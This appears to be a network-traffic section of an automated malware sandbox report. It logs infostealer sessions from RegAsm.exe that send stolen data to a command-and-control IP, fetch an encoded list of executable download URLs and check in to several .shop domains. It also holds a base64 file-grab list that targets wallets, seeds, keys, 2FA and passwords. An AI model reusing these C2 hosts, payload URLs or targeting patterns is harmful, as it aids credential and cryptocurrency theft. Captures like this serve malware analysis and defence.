                                                                                    2024-09-26 22:14:59 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                    Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.4497605.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:59 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 461
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:59 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIDAKECFIEBGDHJEBKKCont
                                                                                    2024-09-26 22:15:00 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.4497625.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:01 UTC279OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCB
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 98737
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAFCFBAEGDHIEBFHDGCBCont
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 74 49 52 51 41 6c 42 6f 6f 6f 30 47 4a 52 52 52 51 4d 53 6b 70 31 4a 69 69 34 43 55 6c 4f 78 54 54 51 4d 4b 53 6c 6f 6f 47 4e 4e 46 4c 53 55 44 44 74 53 55 75 4b 54 46 41 78 4b 53 6e 55 6d 4b 51 43 55 6c 4c 31 70 4b 42 69 64 36 54 74 54 71 51 69 67 6f 51 30 6c 4f 4e 49 52 51 4d 62 30 4e 46 4b 61 54 72 51 41 6e 57 6b 49 70 32 4d 55 30 69 67 6f 4b 51 38 69 6c 78 53 66 51 59 6f 41 4b 53 6c 78 7a 6d 69 67 59 32 69 6c 70 4f 2f 39 61 42 69 48 6b 55 48 6b 55 74 46 41 78 75 66 78 46 4a 30 70 78 37 30 33 48 46 41 77 2f 43 6a 72 2f 38 41 58 70 65 63 65 74 49 65 66 61 67 59 68 35 6f 78 6d 6c 2f 53 6b 78 6e 2f 41 41 6f 41 54 38 50 7a 6f 36 30 55 70 6f 47 4e 78 78 33 70 4f 31 4f 50 76 53 47 6d 41 6c 42 48 72 52 30 6f 50 74 53 47 4a 2f 6b 30 67 2f 47 6e 48 6d 6d 30 77
                                                                                    Data Ascii: tIRQAlBooo0GJRRRQMSkp1Jii4CUlOxTTQMKSlooGNNFLSUDDtSUuKTFAxKSnUmKQCUlL1pKBid6TtTqQigoQ0lONIRQMb0NFKaTrQAnWkIp2MU0igoKQ8ilxSfQYoAKSlxzmigY2ilpO/9aBiHkUHkUtFAxufxFJ0px703HFAw/Cjr/8AXpecetIefagYh5oxml/Skxn/AAoAT8Pzo60UpoGNxx3pO1OPvSGmAlBHrR0oPtSGJ/k0g/GnHmm0w
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 43 57 4a 39 57 65 4d 2b 54 62 52 6e 64 35 53 6e 71 7a 66 79 2f 78 37 66 57 35 6a 6d 47 47 6f 34 57 63 35 53 54 56 6d 5a 34 58 44 56 70 56 6f 71 31 74 54 53 75 67 71 58 6b 79 4c 39 31 5a 47 41 2b 6d 61 77 50 45 67 42 73 49 6a 33 45 6f 48 36 47 74 63 73 53 53 53 63 6b 38 6d 75 66 38 41 45 63 34 4c 51 77 41 39 4d 75 33 39 50 36 31 2b 54 63 4d 78 6c 57 7a 69 6b 34 64 47 33 36 4b 7a 2f 77 43 47 50 71 4f 49 5a 78 70 5a 5a 55 35 75 71 53 2b 64 30 59 56 4a 7a 53 30 56 2b 31 6e 35 47 46 4e 38 4d 58 2f 39 6e 66 45 65 78 6c 4a 77 73 6b 71 77 74 2f 77 4e 64 76 38 41 4d 67 2f 68 54 71 35 33 55 4a 48 68 31 64 70 55 4a 56 30 5a 57 55 2b 68 41 46 5a 56 6f 4b 64 4e 78 66 55 39 54 4b 5a 63 75 49 35 75 79 2f 56 48 72 75 6d 61 66 42 6f 74 76 4a 34 61 6c 56 51 64 62 75 4c 34
                                                                                    Data Ascii: CWJ9WeM+TbRnd5Snqzfy/x7fW5jmGGo4Wc5STVmZ4XDVpVoq1tTSugqXkyL91ZGA+mawPEgBsIj3EoH6GtcsSSSck8muf8AEc4LQwA9Mu39P61+TcMxlWzik4dG36Kz/wCGPqOIZxpZZU5uqS+d0YVJzS0V+1n5GFN8MX/9nfEexlJwskqwt/wNdv8AMg/hTq53UJHh1dpUJV0ZWU+hAFZVoKdNxfU9TKZcuI5uy/VHrumafBotvJ4alVQdbuL4
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 31 62 6a 47 49 70 57 51 59 39 69 52 57 2b 45 7a 43 4f 4a 6d 34 4a 57 30 75 63 65 50 79 69 65 43 70 4b 70 4b 53 64 33 62 38 2f 38 41 49 72 55 6c 4c 52 58 65 65 53 4a 53 34 6f 37 55 55 41 64 58 42 34 43 76 72 69 32 69 6e 53 37 74 67 73 69 42 77 44 75 7a 67 6a 50 70 54 2f 38 41 68 58 6d 6f 2f 77 44 50 35 61 2f 6d 33 2b 46 64 35 70 66 2f 41 43 43 4c 4c 2f 72 33 6a 2f 38 41 51 52 56 48 55 2f 46 57 68 36 52 4e 35 4e 37 71 4d 55 63 6f 36 6f 6f 4c 73 50 71 46 42 49 2f 47 76 6c 6f 59 2f 47 54 64 6f 75 37 39 46 2f 6b 66 65 7a 79 66 4c 6f 4b 38 6f 57 58 71 2f 77 44 4d 34 32 66 77 48 66 32 39 76 4c 4d 31 31 61 6c 59 30 4c 6b 41 74 6e 41 47 66 53 75 66 31 48 54 72 6a 53 37 78 72 61 35 54 44 4c 30 50 5a 68 36 69 76 53 6f 66 45 6d 69 36 39 62 7a 32 65 6e 36 6a 44 4a 50
                                                                                    Data Ascii: 1bjGIpWQY9iRW+EzCOJm4JW0ucePyieCpKpKSd3b8/8AIrUlLRXeeSJS4o7UUAdXB4Cvri2inS7tgsiBwDuzgjPpT/8AhXmo/wDP5a/m3+Fd5pf/ACCLL/r3j/8AQRVHU/FWh6RN5N7qMUco6ooLsPqFBI/GvloY/GTdou79F/kfezyfLoK8oWXq/wDM42fwHf29vLM11alY0LkAtnAGfSuf1HTrjS7xra5TDL0PZh6ivSofEmi69bz2en6jDJP
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 7a 30 74 59 32 39 78 57 55 54 53 5a 6f 39 6c 46 68 79 6d 32 6d 70 32 4c 48 35 34 4a 56 2f 77 42 31 73 31 59 53 35 30 79 54 2f 6c 35 65 4d 2f 37 61 56 7a 52 6b 56 61 61 5a 2f 51 56 4c 6f 4c 75 48 73 32 39 6a 72 6c 68 74 35 44 69 47 2b 67 50 73 57 78 56 36 31 73 6e 74 31 6e 6b 5a 30 4b 2b 53 32 43 72 64 38 56 35 38 38 78 7a 54 56 75 5a 6b 7a 74 6b 64 63 38 59 42 72 4b 64 43 54 56 6c 49 62 77 38 6d 74 78 73 6e 33 6a 30 71 50 36 30 37 4f 63 65 6c 4e 50 70 2b 74 64 46 7a 72 53 30 45 4a 34 70 44 2b 4e 48 54 76 52 53 4b 51 32 67 38 48 74 51 54 67 30 55 46 41 66 63 34 70 76 53 6e 55 33 76 78 53 47 48 66 6d 67 6e 6a 2f 43 67 47 6b 50 50 76 53 41 54 38 71 54 50 31 50 76 53 30 6d 4b 43 67 2b 74 49 52 39 4b 58 72 2b 64 49 66 65 67 42 42 7a 37 65 39 46 41 48 4e 41 35
                                                                                    Data Ascii: z0tY29xWUTSZo9lFhym2mp2LH54JV/wB1s1YS50yT/l5eM/7aVzRkVaaZ/QVLoLuHs29jrlht5DiG+gPsWxV61snt1nkZ0K+S2Crd8V588xzTVuZkztkdc8YBrKdCTVlIbw8mtxsn3j0qP607OcelNPp+tdFzrS0EJ4pD+NHTvRSKQ2g8HtQTg0UFAfc4pvSnU3vxSGHfmgnj/CgGkPPvSAT8qTP1PvS0mKCg+tIR9KXr+dIfegBBz7e9FAHNA5
                                                                                    2024-09-26 22:15:01 UTC16355OUTData Raw: 4e 4c 53 55 44 43 69 69 67 30 41 4a 53 47 6c 70 4b 42 68 51 61 4b 44 51 4d 53 69 69 69 67 59 6c 42 6f 6f 4e 4d 42 44 53 55 74 49 61 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 41 55 47 69 6b 6f 47 46 4a 53 30 6c 4d 59 47 6b 6f 6f 6f 47 4a 52 52 33 6f 6f 41 53 6b 4e 4c 33 70 4b 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 4d 4b 53 69 6b 4e 41 77 70 4b 57 6b 6f 41 4b 51 30 74 4a 51 4d 44 53 55 55 68 6f 47 46 42 6f 6f 4e 41 78 4b 54 76 51 61 4b 42 69 55 55 55 55 44 45 6f 4e 46 42 6f 47 4a 53 55 47 69 6d 43 41 30 6c 4b 61 53 6b 4d 53 6b 70 61 53 67 6f 54 76 51 61 42 52 51 41 6c 4a 69 6c 70 4b 5a 51 64 71 53 6c 70 4b 41 45 6f 6f 70 4b 42 68 53 55 64 71 44 51 55 46 49 61 44 53 47 67 41 70 4b 57 6b 6f 47 46 4a 53 30 68 7a 53 47 68 4b 4b 4f 2f 4e 47 4d 30 79 68 4b 43
                                                                                    Data Ascii: NLSUDCiig0AJSGlpKBhQaKDQMSiiigYlBooNMBDSUtIaBhSUppKBhSUtJQAUGikoGFJS0lMYGkoooGJRR3ooASkNL3pKBhSUppKBhSUtJQMKSikNAwpKWkoAKQ0tJQMDSUUhoGFBooNAxKTvQaKBiUUUUDEoNFBoGJSUGimCA0lKaSkMSkpaSgoTvQaBRQAlJilpKZQdqSlpKAEoopKBhSUdqDQUFIaDSGgApKWkoGFJS0hzSGhKKO/NGM0yhKC
                                                                                    2024-09-26 22:15:01 UTC607OUTData Raw: 6a 4a 4e 63 4a 43 75 71 36 62 44 70 47 68 36 4e 64 66 59 37 31 59 48 31 4b 2b 75 51 32 33 37 50 76 54 68 69 77 79 56 32 51 34 4f 52 7a 38 37 41 63 6e 6e 6b 31 31 76 56 6c 73 70 72 49 61 6e 65 66 59 35 33 38 79 61 33 38 39 76 4c 6b 62 49 4f 35 6c 7a 68 6a 6b 44 6b 6a 74 54 6c 38 51 61 78 48 71 38 32 71 77 36 6c 64 51 58 38 78 4f 2b 34 74 35 54 45 78 7a 31 48 79 34 77 4f 6e 41 34 34 46 46 67 75 65 6e 51 61 37 4e 64 6d 50 55 74 42 6e 75 4a 4c 69 62 57 72 4b 77 75 4c 6e 61 56 6b 76 49 31 68 78 6d 51 64 78 49 77 59 6b 48 72 67 5a 35 46 5a 64 39 4c 4e 59 32 32 71 61 4a 63 61 6c 48 48 59 61 6e 4d 31 74 70 46 68 4c 4a 74 67 68 69 2b 30 45 2f 61 57 2f 68 51 44 61 77 44 66 65 4f 53 65 6e 4a 34 6b 2b 4b 50 45 44 58 4d 31 79 32 75 36 6d 62 69 61 50 79 70 5a 54 64 79
                                                                                    Data Ascii: jJNcJCuq6bDpGh6NdfY71YH1K+uQ237PvThiwyV2Q4ORz87Acnnk11vVlsprIanefY538ya389vLkbIO5lzhjkDkjtTl8QaxHq82qw6ldQX8xO+4t5TExz1Hy4wOnA44FFguenQa7NdmPUtBnuJLibWrKwuLnaVkvI1hxmQdxIwYkHrgZ5FZd9LNY22qaJcalHHYanM1tpFhLJtghi+0E/aW/hQDawDfeOSenJ4k+KPEDXM1y2u6mbiaPypZTdy
                                                                                    2024-09-26 22:15:03 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:02 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.4497635.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:03 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HIIEBAFCBKFIDGCAKKKFCont
                                                                                    2024-09-26 22:15:05 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:05 UTC280INData Raw: 31 30 63 0d 0a 4d 54 49 79 4d 44 55 33 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 41 31 4e 7a 64 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 77 4e 54 63 34 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 51 35 59 57 49 77 5a 44 52 6a 4e 31 39 79 5a 48
                                                                                    Data Ascii: 10cMTIyMDU3NnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjA1Nzd8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIwNTc4fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWQ5YWIwZDRjN19yZH


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.449766104.21.36.1394431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:07 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: wallkedsleeoi.shop
                                                                                    2024-09-26 22:15:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:08 UTC782INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=iu42ri28c519topkhkq0vdob8h; expires=Mon, 20 Jan 2025 16:01:46 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glI76XA6lC7PCT%2FneKkSj9AGbCTIpmCbM%2FWfLOAlUORbPlx9p%2BXchAB7UT%2FErNiQl01DMQFUM1FV7MgyuE9Jo%2FplU9YKY%2B0Cf7raX0uzir49EwZYCS7u%2BCbcw7c1mO6Gv7z%2FmVo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c6188561774-EWR
                                                                                    2024-09-26 22:15:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.4497655.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:07 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 499
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:07 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HDHCFIJEGCAKJJKEHJJECont
                                                                                    2024-09-26 22:15:08 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.449767104.21.4.1364431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:08 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: gutterydhowi.shop
                                                                                    2024-09-26 22:15:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-09-26 22:15:09 UTC774INHTTP/1.1 200 OK
                                                                                    Date: Thu, 26 Sep 2024 22:15:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=j1ttp21kcrk087efap6vel63j9; expires=Mon, 20 Jan 2025 16:01:47 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2rJu55tBz2rJKspXP4q%2FNYQX%2BZNdmtsG7kMfEgThP1lzIGZOjFata3f4Nr91imZ18A2nPEP6jEx%2FV14yGyymBl5VpdxC647n1W4Gu2OiMmogdrIfERJnnutFlfcpZb5GnM3nKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c969c6798d472bc-EWR
                                                                                    2024-09-26 22:15:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-09-26 22:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.449768188.114.97.34431220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:09 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: ghostreedmnu.shop
                                                                                    2024-09-26 22:15:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
